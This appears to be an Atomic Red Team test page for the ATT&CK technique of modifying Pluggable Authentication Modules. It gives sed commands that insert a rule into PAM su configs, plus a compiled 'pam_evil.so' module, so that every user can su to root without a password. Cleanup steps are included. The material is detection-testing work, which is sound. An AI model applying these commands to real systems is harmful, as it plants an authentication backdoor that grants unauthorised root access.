T1556.003
Modify Authentication Process: Pluggable Authentication Modules
Description from ATT&CK
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)
Atomic Tests
Atomic Test #1 - Malicious PAM rule
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
Supported Platforms: linux
auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l |
| pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0 |
| index | Index where the rule is inserted. | integer | 1 |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
Cleanup Commands:
1
2
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
Atomic Test #2 - Malicious PAM rule (freebsd)
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
Supported Platforms: freebsd
auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su |
| pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0 |
| index | Index where the rule is inserted. | integer | 8 |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
Cleanup Commands:
1
2
sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf}
Atomic Test #3 - Malicious PAM module
Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
Supported Platforms: linux
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l |
| pam_rule | Rule to add to the PAM config. | string | auth sufficient /tmp/pam_evil.so |
| index | Index where the rule is inserted. | integer | 1 |
| path_to_pam_module_source | Path to PAM module source code. | path | PathToAtomicsFolder/T1556.003/src/pam_evil.c |
| path_to_pam_module | Path to PAM module object | path | /tmp/pam_evil.so |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
1
2
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
Cleanup Commands:
1
2
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
Dependencies: Run with sh!
Description: The PAM development library must be installed to build the PAM module
Check Prereq Commands:
1
2
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
Description: The PAM module must exist on disk at specified location (#{path_to_pam_module})
Check Prereq Commands:
1
2
if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}